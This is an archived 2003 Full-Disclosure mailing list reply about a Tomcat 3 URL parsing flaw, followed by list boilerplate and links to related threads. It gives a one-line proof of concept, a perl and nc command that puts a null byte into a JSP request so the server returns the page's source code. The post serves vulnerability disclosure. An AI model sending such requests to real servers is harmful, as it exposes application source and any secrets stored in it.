Re: [Full-Disclosure] Apache Jakarta Tomcat 3 URL parsing vulnerability

From: Jouko Pynnonen (jouko@solutions.fi)
Date: 01/30/03

  • Next message: sockz loves you: "Re: [Full-Disclosure] The worm author finally revealed!"
    From: Jouko Pynnonen <jouko@solutions.fi>
    To: <full-disclosure@lists.netsys.com>
    Date: Thu, 30 Jan 2003 14:50:27 +0200 (EET)
    

    One more thing: the vulnerability also allows remote users to retrieve
    source of JSP files in this way:

    $ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080

    -- 
    Jouko Pynnonen          Online Solutions Ltd       Secure your Linux -
    jouko@solutions.fi      http://www.solutions.fi    http://www.secmod.com
    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html
    


    Relevant Pages

    • Re: [Full-disclosure] List of Fuzzers
      ... int authenticate(char* username, char* password) { ... that fuzzing has its limitations (that can be fixed and applied like ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
      (Full-Disclosure)
    • Re: [Full-disclosure] List of Fuzzers
      ... valid to use someone else's fuzzing framework against one's own ... I see "Which fuzzer on this list will help me find the most ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
      (Full-Disclosure)
    • Re: [Full-disclosure] List of Fuzzers
      ... valid to use someone else's fuzzing framework against one's own ... Full-Disclosure - We believe in it. ... Charter: http://lists.grok.org.uk/full-disclosure- ...
      (Full-Disclosure)
    • [Full-disclosure] List Charter
      ... This document serves as a charter for the [Full-Disclosure] mailing ... Typically posting will be ... members may be removed from the list by the management. ...
      (Full-Disclosure)
    • [Full-disclosure] List Charter
      ... This document serves as a charter for the [Full-Disclosure] mailing ... Typically posting will be ... members may be removed from the list by the management. ...
      (Full-Disclosure)